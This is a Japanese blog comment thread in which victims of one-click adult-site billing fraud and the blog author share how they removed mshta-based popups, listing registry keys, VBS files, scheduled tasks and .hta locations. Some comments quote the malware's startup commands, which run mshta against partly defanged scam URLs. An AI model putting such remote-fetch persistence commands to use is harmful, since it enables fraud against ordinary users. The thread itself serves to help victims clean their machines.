    http//windows-service6248.me/reg2.php?cccid=Ta4rimpfxXitb7B2lsKLFyxDaysASBAE


    データの中にmshtaの後に
    http//windows-service6248.meアドレスが出てるので糞サイトだと分かります



    次に再度糞サイトのアドレスで編集のとこから検索

    するとHKEY_CURRENT_USERSoftwareMicrosoftSearch AssistantACMru

    ココに糞サイトの情報が別で出て来る
    フォルダーに数字で5063と5064に糞サイトが潜んでます


    こんな感じのが出てきます
    00  57
    01  mshta.exe
    02  Index.dat
    03  adult
    04  annai


    取り合えず糞サイトのアドレスと
    其れらしいadultやannaiを消す

    レジストリなので一応mshta.exeは残して置きます

    (再起動しても出て来たら5063と5064のフォルダー事再度消して下さい)


    消したらタスクマネージャーに戻ってmshta.exeを
    プロセスの終了を押すと糞サイトは画面から消えます


    プロセスで消したらタスクマネジャーを終了
    次にレジストリエディタを終了

    でパソコンを再起動で出て来なければ終了です

    パソコン内に残ってるゴミを消したい場合は上に書かれてる方同様にプログラムを開かなければ行けないので糞サイトが立ち上らなければこのまま放置でも機能して無いゴミなので無視で良いと思います


    どうしても消したい方は上の方のシステムファイルの表示を参考にすると良いと思います

    ********************
    [ 2011/05/21 23:46 ] [ 編集 ]
    XP使いです。
    検索してもhtaファイルはヒットしなかったのですが(拡張子を含まずファイル名だけで検索していたらしい)
    msconfig入力したときに見つかりました。
    私の場合は
    c:documents and settings\allusers\application data\vu931 の中で
    ttp://www.yy7456.com/member/pay.php のものです。
    肝心のhtaファイル名は羅列ではなくて、あの勝手に何回も表示される画面に出ていたユーザーIDでした。
    (でもこれ、もしかしたらこのサイトに限って言えば全員ID同じかもしれませんね。)
    [ 2011/05/25 15:46 ] [ 編集 ]
    私も映画関係のリンクを追ううちに『洋画は邦画と違い、しっとりしたsexシーンをボカスことなく堂々と入れる、たとえば…』から見事にひっかかってしまいました。

    OSはVistaです。

    まずは常駐のアンチウィルスソフトで「高度のチェッック」をすれども「問題なし」ときてまったく役に立たず、
    海外のスパイ駆除ウェア(フリー)を2つ試せば「駆除に成功」しても再起動すれば元の木阿弥。

    数時間の冷や汗・油汗まみれの格闘の後、こちらのサイト様に出会いまして…

    【駆除方法1】msconfig→「スタートアップ」からポップアップのリンク先"ttp://1340.adult109.com~以下略"を呼び出すmshtaコマンドからチェックを外してもダメ。
    レジストリの\Runを何度見直しても怪しげなものはなく、拡張子を表示しての".hta"検索は数多く出てくるものの該当ファイルに自信がなく正直ギブアップ。

    【駆除方法2】でC\Windows\System32\Tasksの中に"boot8836304"というファイルを発見、この数字が上記の方と同じくポップアップで暗記できるほど見た「登録されたあなたのIDナンバー」だったのです。
    これを完全削除!…でやっと終わりました。

    最終的に初期化に覚悟もしていたので、月桂樹葉様の丁寧なご説明&皆様のコメントがとても役立ちました。
    本当にありがとうございます。
    [ 2011/05/31 04:23 ] [ 編集 ]
    おはようございますー
    質問なんですが・・・
    この画面が出始めるとほぼ同時に「Tアンケート」
    というメールを受信したのですが
    メールアドレスを入力した覚えがないのにどうやって
    届いたのでしょうか?

    メール内容はアンケートを称して住所名前等の
    個人情報を引き出すのが目的のようなので
    放置してます

    ネット通販等で買い物したりするので
    ハードディスク内にあるキャッシュ等から個人情報が
    抜かれないか心配です;;
    [ 2011/05/31 06:57 ] [ 編集 ]
    XP使いさん、Hさん、お二人とも請求画面のIDがファイル名に使われていたのですね。情報ありがとうございました。

    aikoさん、別のウィルスなどを一緒にダウンロードした可能性がなきにしもあらずです。まずは信頼のおけるソフトでハードディスク内を完全スキャンすることをオススメします。
    (追記)
    TSUTAYA関係のメールにもTアンケートという名前のものがありますが、心当たりはありませんか?
    [ 2011/05/31 18:03 ] [ 編集 ]
    月光仮面さんから、***以下のコメントをいただきました。

    MyDocument下にvbsファイルを置くパターンも増えているのですね。
    (コメントに2,3似たパターンがあります。)
    ていねいなご報告ありがとうございました。助かる方もいると思います。

    サイトのリンクがあったので、面白がって踏む人がいないように編集させていただきました。すみません。
    ***************************

    初めまして、月光仮面です。上の対策記事は大変参考になりました。どうもありがとうございます。
    数時間前にmshta.exeを働かせるワンクリック詐欺にかかり、削除に成功しましたので報告します。
    私の場合、VBScriptを使った手口でした。
    OSは、Windows 7です。
    その手口ですが、C:User(私のユーザー名)Documents下に、
    cloth_5a858dc60b98c7e9279a1039ee68de5e370e2c7f.vbs
    という、VBScriptが置いてあり、レジストリーの、
    HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
    で、
    cloth_5a858dc60b98c7e9279a1039ee68de5e370e2c7f
    のキー名でそのVBScriptを働かせるデータを書いていました。
    そのレジストリーとVBScriptを削除して、問題は解決しました。
    そのVBScriptには、
    "system32mshta ttp://guidance.chamaeleonmovie(中略)/player_view.php?(中略)
    5a858dc60b98c7e9279a1039ee68de5e370e2c7f"
    という直接の指示をmshta.exeに出す方法で詐欺画面を表示させていました。
    上の記事にある方法ではなかったので、参考になればと思いコメントしました。
    なぜ気が付いたかというと、相当の試行錯誤の後に、自分のDocument下に変なVBScriptがあるのに気付き、そのソースコードを見てわかりました。
    [ 2011/06/21 03:26 ] [ 編集 ]
    当サイトを参考にして請求表示を消すことができました!ありがとうございました。

    最初は焦ってしまい、振り込んですませようかとか考えてしまったのですが、週末だったのが幸いし一晩寝たら多少は冷静に(笑)。以下の事に気づく事ができました。
    ・向こうは請求をしようにもこちらの情報を知らないハズである。環境変数から情報入手したとしてもプロバイダのIP止まりと思われる。
    ・連絡などをしたら、かえってこちらの情報を渡す事になる。
    以上から請求は無視、表示を消す方に頭を切り替える事にしました。
    そしてタスクマネージャなどを参考にしてmshta.exeが請求表示をしているらしいと推測、最初は削除してみたのですが、再起動すると復活。ウェブ検索でこちらのサイトを見つけ、レジストリのHKEY_CURRENT_USERの方の~\CurrentVersion\RunにワンクリサイトのURL(その下のフォルダのファイルを指定していた)を発見しました。
    そこで喜んで消してしまったので、そのキーと値の正確な記述はここに書けない(失敗!)のですが、IEを使ってそのURLの請求画面を表示させていたようです。

    大した情報もないのに長文コメントしてしまってすみませんでした。でも、とても嬉しかったのです。
    そしてなにより、「同じような状況から同様に対処した人がいる」という事実、「請求は無視すべき」と明言された事が、どれだけ安心に繋がったか。本当にこのようなサイトをつくられていることに感謝致します。
    [ 2011/06/26 06:50 ] [ 編集 ]
    うまく解決できたとのこと、当方もたいへん嬉しいです!

    コメントは新しい情報を書かなければならない、ということはないのですが、
    ”請求画面が出たときには、冷静に対処すべき”という貴重なご意見でした。
    もっとも、うかつを反省さんは冷静になったからこそ、当サイトにいらしたわけですが。
    [ 2011/06/26 09:10 ] [ 編集 ]
    secretモードで次のようなコメントをいただきました。secretモードでしたのでお名前は伏せておきます。

    > HKEY_LOCAL_MACHINESOFTWAREMicrosoftShared ToolsMSConfigstartupreg(ワンクリックウェア名)
    >
    > にも潜んでたりしましたよ(^^)
    > msconfigでフォルダ名が確認できたの
    > レジストリでフォルダまるごと消して解決しました。

    たぶん、この方はmosconfigのスタートアップで(ワンクリウェア名)のチェックをはずした方だと思われます。
    チェックをはずすと、上の場所に(ワンクリックウェア名)が表示されます。
    チェックをはずしても(ワンクリックウェア名)がスタートアップには残るので、それを消したい場合は上のような操作をするといいですね。コメントありがとうございました。
    [ 2011/06/29 13:11 ] [ 編集 ]
    secretで
    > パソコン初心者で駆除方法1のmsconfigで
    > スタートアップから削除したのみなのですが、これでは不十分なのでしょうか…?
    という質問をいただきました。
    初心者さんの場合、もう画面が表示されないようなら、レジストリをいじらず、そのままでいいと思います。
    [ 2011/06/30 22:31 ] [ 編集 ]
    こんにちわ~
    お初です

    ワンクリックに見事に引っかかりました(笑
    キャンペーン中とかでカウントダウン付だったんで
    焦ってたんですが、このサイトのおかげで
    気が楽になりました。ありがとうございます(^^*)

    熟練者の壁は越えられませんでしたが、
    他の有志のお方の「復元」という方法は初心者の私には
    効果テキメンな方法でした!!

    このサイトの存在をありがたく思います♪
    お世話になりました~(^^)ノシ
    [ 2011/07/05 17:27 ] [ 編集 ]
    お初で嬉しいですヽ(´▽`)/
    [ 2011/07/05 20:49 ] [ 編集 ]
    始めまして。
    駆除方法1で解決できました。誠にありがとうございます。
    その方法でデータを一つも消さないままで済むですが、やっぱり原因であるデータはまだ残っているではないかと考えましたので、上記の様々な方法で怪しげなデータを探してみました。
    ですが、RUNの中にも、他の所も見つかりませんでした。
    trendmicroに載っている方法で探しても、htaかそれっぽい物は全く見つかりませんので、ちょっと不安です。

    最初から侵入したデータが無いなのか、自分は見つからないだけなのか。
    正直、これからどうすれば良いだろうか、またはこのまま放って置いてもいいかは分かりません。

    どうか、月桂樹葉さんの意見をいただきたいです。

    私の日本語はちょっと分かりにくいかもしれません。本当に申し訳ございません。

    (ちょっと恥ずかしいながら、今回の原因でありそうなサイトは、たぶんアレ的なサイトですので、やっぱり侵入したデータがあるではないかと思います。)
    [ 2011/07/09 11:19 ] [ 編集 ]
    すみません。
    もう一つ聞きたいことを書き忘れました。

    この問題が発生した後、当日に私のパソコンのWindowsがアプデートされました。
    この場合、システムの復元を行ったら、問題が起こるでしょうか?
    IPAのサイトではパソコンが起動しなくなるといった状態になる可能性もあると書いてありますので、やっぱり怖いです。

    どうか、ご意見をお願いいたします。

    PS.私のパソコンはWindows7を使ってます。ご参考になれば、幸いです。
    [ 2011/07/09 11:34 ] [ 編集 ]
    はじめまして。
    レジストリの中にもなく、コメント欄で寄せられた新しい情報の中にも該当するものがない場合、
    しばらく様子をみていいと思います。
    会社のPCで、2度と画面が現れては困る場合は、駆除方法2もチェックしてくださいね。
    他のウィルスも一緒に入っていないか心配な場合は、ウィルスソフトでフルスキャンしてみてはいかがでしょう。
    [ 2011/07/09 11:46 ] [ 編集 ]
    Avastで全部スキャンしてみました。
    ウィルスがないようです。
    会費請求画面はもう現れないですし、ウィルスも見つからないなら、たぶんこれで問題ないでしょう。

    ご意見いただいて、誠にありがとうございます!
    [ 2011/07/10 16:24 ] [ 編集 ]
    こちらを参考にさせていただいたので、お礼に症例を報告させていただきます。
    まずレジストリが
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\weberomd
    command
    mshta "C:\Documents and Settings\All Users\Application Data\eromd\XXXXXXXX.hta"
    eromdの中身が
    2.dat, bg.jpg, XXXXXXXX.hta
    で問題のポップアップでした。
    つい最近かかったそうでしたが、こちらでは去年からの騒ぎだったのですね。
    ありがとうございました。
    [ 2011/07/11 15:06 ] [ 編集 ]
    MEWさん、良かったです。
    印刷屋さん、ご報告ありがとうございました。
    Application Dataの下にそのフォルダがあったのですね。
    お知り合いは印刷屋さんのおかげで、嬉しくてまた泣いてしまったことでしょう。
    [ 2011/07/11 19:24 ] [ 編集 ]
    こんにちは。
    本日mshta以外の感染方法を確認したので書いておきます。

    今度はrundllを使ってます。

    記述されるレジストリキーはmshtaと同じRunの場所に書かれていますが、書き方が違うのでmshtaで探しても見つからないでしょう。

    ここを確認すると実ファイルのパスがわかりますが、中に入っているのはテキストファイルに偽装されたdllファイルや画像のようです。

    このフォルダごと削除して、レジストリの項目を削除して再起動して動作確認してください。

    [ 2011/07/18 12:48 ] [ 編集 ]
    とおりすがりさん
    新しいご報告ありがとうございました!

    確認される方へ
    rundllで見つかるものでも、正しく必要なものもありますので、
    きちんと確認して大切なものは消さないようにしましょう。
    [ 2011/07/18 20:53 ] [ 編集 ]
    私の場合、vistaなんですが、マイコンピューター\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Runにいました。
    とりあえずmshta.exeを消そうとしたんですが通常環境ではセキュリティがきつく消せないのでセーフモードでDOS環境で直デリートして画面は出なくなったんですが気色悪かったので参考にさせていただいて、REGと隠しファイル共に消せました。
    ありがとうございました。
    [ 2011/07/25 23:50 ] [ 編集 ]
    親から怪しいサイトはみないようにいわれてたんですが、ついみたくなっちゃってアダルトサイトいったらワンクリック詐欺にあってしまいました。 
    それで毎回請求画面がでるので焦って夜眠れなかったので親にいったらカンカンに怒られました(笑
    無視してもでるので友達に相談してみたらこのサイトをみつけて方法1でやってみたらでなくなったので友達と
    月桂樹葉さんに感謝しています
    親にいわれてメアドとかを全部消すように言われたので残念です
    今度からはそういう所にいかないようにしたいです
       長文申し訳ありませんでした!
    [ 2011/07/26 00:10 ] [ 編集 ]
    tacoさん
    (ノ´▽`)ノオオオオッ♪裏ワザ使いましたね。
    mshta.exeは削除しなくていいということは、記事を読んでわかっていただけたと思います。

    しじみさん
    夜眠れないほどのたいへんな思いをしましたね。払いこまないで良かった!
    ほほえましいコメントありがとう。
    [ 2011/07/26 00:45 ] [ 編集 ]
    不本意にもカーソルの位置を確認しないままにクリックしてしまいわずらわしい事になってしまいました。
    焦りましたが こちらにたどり着き 冷静に対処したところ その日の内に正常に戻すことが出来ました。
    PC事情には疎い私で 月桂樹さんの示されたケースと合致はしなかったのですが ひっかかった時間は分かっていたので 最後は時間を頼りに怪しげなファイルを削除したところ成功しました。 ありがとうございました。
    [ 2011/07/30 17:22 ] [ 編集 ]
    自分は最初の方法のどれにも該当していませんでした;
    runも全部見てみたのですが、.exeだけみたいな感じで、
    それと、動画を保存で見ていたらしく、もう一度クリックするともう一個増えてましたwww
    結局よくわかんなかったので、プロセスツリー終了?
    を押してみたら(2個とも)、消えました、

    再起動しても映りませんでした
    他のファイルとかに支障は出ないでしょうか?
    [ 2011/08/06 02:16 ] [ 編集 ]
    消えてよかったですね。 anonymsさんにご意見のある方、よろしくお願いします。
    [ 2011/08/07 00:09 ] [ 編集 ]
    ワンクリックの不正請求に引っかかってしまい、ここのHPを参考にして、削除しました。しかし、PCを起動すると必ず、残滓しも言うべきなのか、が亡霊のように立ち上がってきます。ちなみに、ソースの表示は
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML><HEAD>
    <META content="text/html; charset=shift_jis" http-equiv=Content-Type></HEAD>
    <BODY></BODY></HTML>
    プロパティは
    プロトコル:File Protocol
    種類:HTMLアプリケーション
    アドレス(URL):file:///C:/ProgramData/utprc/5A54212S.hta
    と表示されます。困り果てています。どうぞご教示下さい。
    [ 2011/08/07 15:21 ] [ 編集 ]
    先ほどのアイアイです。
    RegistryBooster 2011
    SystemTweaker 2011
    PowerSuite 2011
    SpeedUpMyPC 2011
    を次々と入手・インストールしましたが、ダメでした。
    宜しくお願いいたします。
    [ 2011/08/07 15:27 ] [ 編集 ]
    復元は試されましたか?
    C:/ProgramData/utprc/5A54212S.hta
    ここに格納されているhtaファイルを削除してもまた生成されますか?
    ファイルとフォルダすべての検索で「ファイルに含まれる単語または句」のところに 
    5A54212Sを入れて探すとそのファイルを生成するファイルが見つかるかもしれません。

    また、後から入れたソフトウェアですが、全部はチェックしていませんが、
    一部はかえって害を起こすソフトウェアのようです。
    ウィルスバスターの無料版のような信頼のおけるソフトウェアを試されましたか。
    (追記)ウィルスバスターによる【駆除方法4】を追加しました。
    [ 2011/08/07 17:30 ] [ 編集 ]
    utprcや5A54212S、.htaをWindows7の右上にある検索ツールに入力しても出てこないのです。最初はそのやり方で見つけ出して駆逐したのですが・・・。
    ところで、「一部はかえって害を起こすソフトウェアのようです」とのことですが、駆逐のために、あちらこちらを検索し、有料で導入しました。一体どんな害が考えられますか?
    [ 2011/08/07 18:27 ] [ 編集 ]
    > utprcや5A54212S、.htaをWindows7の右上にある検索ツールに入力しても出てこないのです。最初はそのやり方で見つけ出して駆逐したのですが・・・。
    windows7でファイル内の文字を検索する一つの方法として、整理→フォルダオプション→検索→ファイル名と内容を常に検索するにチェックを入れます。それから、右上の検索窓に5A54212Sなどを入れてCドライブを検索してみてください。(訂正しました。)
    あと、復元は試されていないのですね?

    > ところで、「一部はかえって害を起こすソフトウェアのようです」とのことですが、駆逐のために、あちらこちらを検索し、有料で導入しました。一体どんな害が考えられますか?
    たとえば、一番上のソフトの2011をとった名前をgoogleで検索してみてください。もちろん、検索結果の情報が全て正しいとは限りませんから、自分が信用してもよいと思われるのなら、そのままに。反対に、これは良いソフトです、という情報も正しいとはかぎりません。私は、余程信頼のできるソフトでなければ入れないようにしています。
    [ 2011/08/07 21:29 ] [ 編集 ]
    手順通り、復元を試行しましたが、復元ポイントの最古が2011/07/21となっており、断念せざるを得ませんでした。確か、7月の14日か15日に、なでしこジャパンのニュースをサイトで見ているとき、澤選手の写真をクリックしているうちに、あっという間にワンクリックの不正請求に引っかかってしまったのです。そこまでさかのぼるのは無理なようです。
    残された方法として、ご教示いただいた、「windows7でファイル内の文字を検索する一つの方法として、ツール→フォルダオプション→検索→ファイル名と内容を常に検索するにチェックを入れます」を行いたいのですが、やり方が理解できません。詳しく教えていただければ幸いです。
    [ 2011/08/08 00:56 ] [ 編集 ]
    システムの復元を試行した後、今まで通り普通に起動すると、以下の表示のウィンドウが掲示されます。

    sump.exe-ディスクがありません
    × ドライブにディスクがありません。ディスクをドライブ\Device\Harddisk1\DR1に挿入して下さい。
    <キャンセル><再実行><続行>

    上記の意味するところを教えて下さい。どこをクリックしても消えず、しつこく立ち上がってきて、新たな悩みになっています。
    あと、ウィルスバスター16は以前からインストールしてあります。
    [ 2011/08/08 01:14 ] [ 編集 ]
    すみません。ツールでなく整理でした。
    windows7のある単語を含むファイルを探す別の方法はここにも出ています。
    http://soudan1.biglobe.ne.jp/qa6927605.html

    また、エラーメッセージは、●peedUpMyPCが原因のようですね。
    googleでsump.exeと入れるといくつか解決法が出てきます。

    (追記)ウィルスバスターで駆除する方法を記事に【駆除方法4】として掲載しました。
    [ 2011/08/08 02:06 ] [ 編集 ]
    俺もこれに引っかかったけど元ファイルワードパッドで開いて遊べたから面白いwwww
    詐欺ってこんなに馬鹿なんですかww??
    単純すぎますwww
    ジャバスクリプトでできてました。
    [ 2011/08/09 14:59 ] [ 編集 ]
    twitterで流れてきたURLからワンクリに引っかかってしまいました><
    まさかの初歩的ミス・・・
    払わなくていいのはわかっていても、タスクで出るからほんとうざくて・・・

    ちなみにスタートアップにもレジストリにもおらず、結局windows32\taskのところにありました。

    これで一安心♪
    [ 2011/08/31 17:29 ] [ 編集 ]
    駆除方法2番を試したところ無制限にウィンドウが現れなくなりました。

    しかし、その後も3つほどウィンドウが出てきていたのでHDD内を検索したところ、「ドキュメント」内に
    (2番で削除したファイル名).vbs
    という名前のファイルがあり、それを削除することで完全に解決しました。
    [ 2011/09/16 12:29 ] [ 編集 ]
    皆さん、解決したようで良かったです。3つもウィンドウを出すなんて、ひどすぎますね。
    [ 2011/09/16 13:14 ] [ 編集 ]
    スタート→ファイル名を指定して実行→msconfig.exeと入れて「スタートアップ」タグで見つかった身元不明のVBScriptファイルがあり、「チェックを外して無効」にしただけでは解決しませんでしたが、元のファイルを削除することにより解決できました。
    復元やレジストリを触らずに済んでほっとしました。
    [ 2011/09/18 10:05 ] [ 編集 ]
    追加情報ありがとうございました(^ム^)
    [ 2011/09/18 13:11 ] [ 編集 ]
    bg.jpgのファイルを移動したら、暫くして消えました。
    エラーになったかも?
    [ 2011/09/18 15:45 ] [ 編集 ]
    自分のPCはWindows7です。

    ご指摘のレジストリに登録ありました。
    自分のPCの場合、実行ファイルはVBスクリプト(~.vbs)形式でした。
    ~\System32\Taskフォルダにタスクファイルもいましたので、タスクファイル、VBSファイル、レジストリをすべて消去しました。

    ※TaskファイルやVBSファイルをメモ帳で開いて、実行ファイルであることを確信しました。
    [ 2011/10/01 01:19 ] [ 編集 ]
    最近、主流(?)はvbsのようですね。ありがとうございました。
    [ 2011/10/01 02:15 ] [ 編集 ]
    ちょうどウィルスバスター2011をセキュリティソフトに使用していたので、
    【駆除方法4】のリンクをたどりトレンドマイクロの対処方法にしたがって作業し、
    どうやら駆除できた模様です。

    ちなみに自分のPCはWindows7ですが、
    「ドキュメント」フォルダに原因となるVBスクリプトファイルがありました。
    最終的にはこいつを削除しまして、今のところ問題なさそうです(^^;

    お恥ずかしい話でしたが、本当に助かりました!
    [ 2011/10/02 02:11 ] [ 編集 ]
    リンク先の記事はうまく機能したようですね。
    ご報告ありがとうございました。
    [ 2011/10/02 22:36 ] [ 編集 ]
    私もアダルトサイトの3クリック(“はい”“はい”“OK”)にて引っかかってしまい、入会請求画面が消えなくなりました。
    その後、ファイル名を指定して実行→msconfig→スタートアップの見慣れない項目のチェックマークを外し、常駐を停止させたら消えたのですが、 まだプログラムはどこかに潜んでいる筈で、知識が無いため完全にクリーンにすることはできません。このまま放っておいても大丈夫なのでしょうか?
    [ 2011/10/06 11:33 ] [ 編集 ]
    再び、画面があらわれないようであれば、そのままでいいでしょう。
    画面がまた現れるようであれば、他の駆除方法も参考にしてください。
    [ 2011/10/06 20:03 ] [ 編集 ]
    アドバイスありがとうございました。
    パソコンに悪影響が出たりパフォーマンスが悪くなったりしないか心配だったので・・・。
    それから、もう5日ほど出ていないのですが、また突然現れたりすることもあるのでしょうか?
    [ 2011/10/07 11:07 ] [ 編集 ]
    再起動しても出ず、1週間も出なければ、たいていは大丈夫でしょう。
    (数分おきなどの短いサイクルが多い。)
    万一、現れた場合には駆除方法2も参考にしてください。
    [ 2011/10/09 14:16 ] [ 編集 ]
    月桂樹葉 様

    はじめまして、こんばんは。
    ワンクリック詐欺にはまってしまい、解決法をさがしていたところ、このサイトを見つけました。いろいろな削除方法の紹介と多くの方々の体験談があり、自分の症状やPC(WinXP)の設定状況を確認してから、落ち着いて対処することできました。
    大変ありがとうございました。m(_ _)m

    私の場合は、レジストリの奥の方に「http://・・・」が書き込まれておりました。msconfigでスタートアップの設定だけで、問題のウィンドウを自動表示させないことができましたが、根本原因を排除するため、regeditで「http://・・・」を検索し、mshtaに関係するコードも含め削除(レジストリデータの削除)しました。
    クリーナーなど使わずに済んだことが、何よりも良かったと思います。

    他のURLからのリンクで、あっという間に不正なコードを仕込んでしまうという、なんと巧妙な手口なのでしょう。このサイトの情報が多くの人に広まり、このような詐欺が沈静化することを希望しますが、入口がアダルトサイトであることが、詐欺師の罠なのだと思います。

    とにかく、ほっとしているところです。
    [ 2011/10/12 02:11 ] [ 編集 ]
    落ち着いて対処なさったのが良かった思います。
    この種の手口は沈静化するどころかこの記事をUPした頃より増えているのが実情で残念です。
    [ 2011/10/12 20:46 ] [ 編集 ]
    このページを拝見し、大変参考になりました。私の場合、中学生の息子かいたずらしたらしく、どこで何をしたのか解からず、困っていました。色々ためしてダメで、結局、立ち上げ時にE-NETケーブルを抜き、見に行くアドレスを表示させ、regeditで検索させ見つけました。URLや表示方法など変わっており、イタチごっこですね。レジストリを書き換えたプロセスが解からず、不安は残りますが、とりあえず良しとします。
    [ 2011/10/13 02:51 ] [ 編集 ]
    お父さん(お母さん?)大奮闘ですね。原因が?だということですがIPAの薦めている予防策
    http://www.ipa.go.jp/security/topics/alert20080909.html#chap4
    をご家族に徹底しましょう。フィルタリングソフトも入れるといいですね。
    MSのファミリーセーフティー(無料)というのもあります。
    [ 2011/10/13 21:46 ] [ 編集 ]
    与作さん から以下のコメントをいただきました。
    既出の通り、問題あるサイトへのリンクは編集させていただきますが、お許しください。
    コメントありがとうございました。

    > 私もとあるサイト(最下部にURL記載)で感染したのですが、ここに書かれている方法で解決できました。
    >
    > ありがとうございます。
    >
    > 私の場合はレジストリスタートアップ(HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun)に『mystify_88f7af90082eb78d54c0c8d7a9ed9ae8f789a01cb8da665e.vbs』という名前のファイルが登録されており、マイドキュメント内に同名の見知らぬVBSファイルが置かれていました。(システム構成では確認できませんでした。)
    >
    > 更に『C:WindowsSystem32Tasks』内に『mystify_88f7af90082eb78d54c0c8d7a9ed9ae8f789a01cb8da665e』と言うファイルが存在し、コレがタスクスケジュールで毎回呼ばれていたようです。
    >
    > 上記ファイル内ですが、見たところマイドキュメント内のVBSを実行するように書かれていました。
    >
    > ちなみに「mystify」とは『惑わす』といった意味合いの単語です。
    > 思いっきり「私、惑わしてます」っていっていたので正直吹きましたけどw
    >
    > とにもかくにも、この情報が役に立てればと思います。
    >
    > 感染先URL⇒ttp://bluespound.***/
    > 環境:Win7Pro(x64)
    > ■不正プログラム構成
    > ・レジストリ記述追加(スタートアップ)
    > ・VBSファイル(マイドキュメント)
    > ・定期実行ファイル(System32Tasks)
    [ 2011/10/17 03:03 ] [ 編集 ]
    はじめまして
    3分おきに出てくる嫌な画面の削除がうまくいかずに、ここにたどり着きました。
    C\Windows\System32\Tasks にファイルがあるとの体験談が書かれてあり、
    私の場合これで対応できて、大変参考になり解決しました。

    あと、参考までに
    私のタスクマネージャーの表示では、mshta という名前ではくMwgpn.exeと表示されておりました。
    プロパティを見ると 元のファイル名が mstha と書かれてあり、名前が変わってるようです。

    どうも有難うございましたm(_ _)m
    [ 2011/10/21 06:56 ] [ 編集 ]
    そういうこともあるのですね(@_@) 貴重な情報ありがとうございました。
    [ 2011/10/23 02:22 ] [ 編集 ]
    Tasksのとこでanaway.....ってのを消したら直りました><ありがとです^^
    [ 2011/11/15 03:33 ] [ 編集 ]
    どういたしましてです^^
    [ 2011/11/17 22:05 ] [ 編集 ]
    私も、(>_<)さんと同じく、
    C\Windows\System32\Tasksの中で
    感染日のただの「ファイル」でしたが名前「Qicktime」だったので、だまされそうでした。

    同じく、ファイルをメモ帳で開いたところ、htmlタグで

    <Command>C:\Windows\system32\mshta</Command>
    <Arguments>サイト名</Arguments>

    がありました。
    デスクトップに移動したら止まりました!

    ありがとうございました!!
    [ 2011/12/22 17:10 ] [ 編集 ]
    QuickTimeを騙るとはフトドキな奴。
    ご報告ありがとうございました。
    [ 2011/12/23 13:44 ] [ 編集 ]
    自分もこれは騙しだな?と思いながらもクリックしてしまいひどい目に遭いました・・・
    色々試してみて 
    C\Windows\System32\Tasks
    の中の更新日時が限りなく近いものがあり、それをゴミ箱に移動させたところ「しばらくして」出てこなくなりました

    まだ少し様子見ですが大丈夫だと思います。

    しかし、mshta.exeは残ったままなのですが、どうしたら消せますかね?

    OSはvistaです


    長文失礼しました
    [ 2012/01/06 03:11 ] [ 編集 ]
    追記:会費請求画面にも表示されますが 登録(?)してしまった日時をメモしておくといいと思います。
    それが手掛かりとなって今回は解決できたので。
    [ 2012/01/06 03:22 ] [ 編集 ]
    記事の【最後に】に理由が詳しく書いてありますが、mshta.exeは消さなくていいですよ。
    [ 2012/01/06 05:01 ] [ 編集 ]
    レジストリエディタで、mshta.exe検索して
    htaファイルを削除をするはずが、
    mshta.exeを間違って削除してしまいました。
    再起動しても復活していない気がするんですが、
    どうしたらいいんでしょうか?
    今、mshta.exeで検索すると
    C:¥WINDOWS¥System32¥mshta...だけでます・・。
    [ 2012/01/06 12:16 ] [ 編集 ]
    削除する必要がなく再起動すると復活するのは
    C:¥WINDOWS¥System32¥mshta.exeのことです。
    [ 2012/01/07 00:51 ] [ 編集 ]
    2年間家族の目に見えぬように隠してたけど
    これで普通に再起動できる~!!

    [ 2012/01/20 04:44 ] [ 編集 ]
    >2年間家族の目に見えぬように隠してたけど

    なんと涙ぐましい努力!
    [ 2012/01/21 00:54 ] [ 編集 ]
    家族兼用なので本当に助かりました。
    丁寧な解説でとてもわかりやすかったです!
    ありがとうございました!
    [ 2012/02/04 03:37 ] [ 編集 ]
    お役に立てて嬉しいです(〃∇〃v)♪
    [ 2012/02/04 12:50 ] [ 編集 ]
    父がなにかやらかしたようで、mshtaポップアップ画面が消しても出てくるという事象が続いていました。

    貴サイトを参考にし、プログラム、スタートアップ、レジストリで怪しい拡張子のものを探しましたが、mshta、hta、vps等のものはみつからず・・・

    スタートアップのプログラムを一つ一つ確認することにしました。

    すると、1つだけプログラムの場所がDocument and settings内にあるものがあり、確認したところ、mshtaを起動させるプログラムがありました。

    該当ファイルを削除の上、スタートアップを無効にすることで解決いたしました。


    レジストリからも削除したいのですが、レジストリが見つかりません。

    msconfigのスタートアップの場所欄にはSOFTWARE\Microsoft~とあり、レジストリエディタにはSOFTWAREから始まるフォルダがありません。

    どうやって消せますでしょうか?
    (要するに、スタートアップの項目から削除したいということです)

    [ 2012/04/10 00:27 ] [ 編集 ]
    お父上のために、がんばりましたね。
    SOFTWARE\MicrosoftはレジストリエディタのHKEY_LOCAL_MACHINEの下にあります。
    [ 2012/04/10 12:32 ] [ 編集 ]
    返信ありがとうございます。

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft以下を探してみましたが、該当のレジストリはありませんでした。

    msconfigのスタートアップ内の他のレジストリの場所はHKCUやHKLM内のSOFTWAREにあるようなのですが、該当のレジストリはSOFTWAREから始まる場所にあるようなのです。

    スタートアップ内から該当の項目が消えればよいのですが、他に方法はございますでしょうか?
    [ 2012/04/10 21:29 ] [ 編集 ]
    HKEY_LOCAL_MACHINESOFTWAREMicrosoftSharedToolsMSConfigstartupreg
    HKEY_LOCAL_MACHINESOFTWAREMicrosoftSharedToolsMSConfigstartupfolder
    の中には、なかったということですね?

    では、レジストリの中をプログラム名で検索してみてください。
    検索の際、キー・値・データにチェックボックスがありますが、
    データ以外のチェックボックスをはずしてみてください。
    どうでしょうか?
    [ 2012/04/10 23:00 ] [ 編集 ]
    親切にありがとうございます。

    HKEY_LOCAL_MACHINESOFTWAREMicrosoftShared ToolsMSConfigstartupreg内にmsconfig内のスタートアップの「場所」と同一の「データ」が書かれているものが見つかりました。

    スタートアップの「場所」名ならびにレジストリの「データ」名はSOFTWARE\Microsoft\Windows\CurrentVersion\Run
    レジストリの「名前」は
    keyでした。
    そのレジストリを消したら、スタートアップからも消えました。

    \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの中しか探していませんでした。

    本当に、巧妙に隠しますね・・・


    ありがとうございました!

    [ 2012/04/12 23:00 ] [ 編集 ]
    見つかって良かったですねv-218
    削除しなくても画面は出てこないと思いますが、
    お気持ちがすっきりしたことでしょうヾ(@~▽~@)ノ
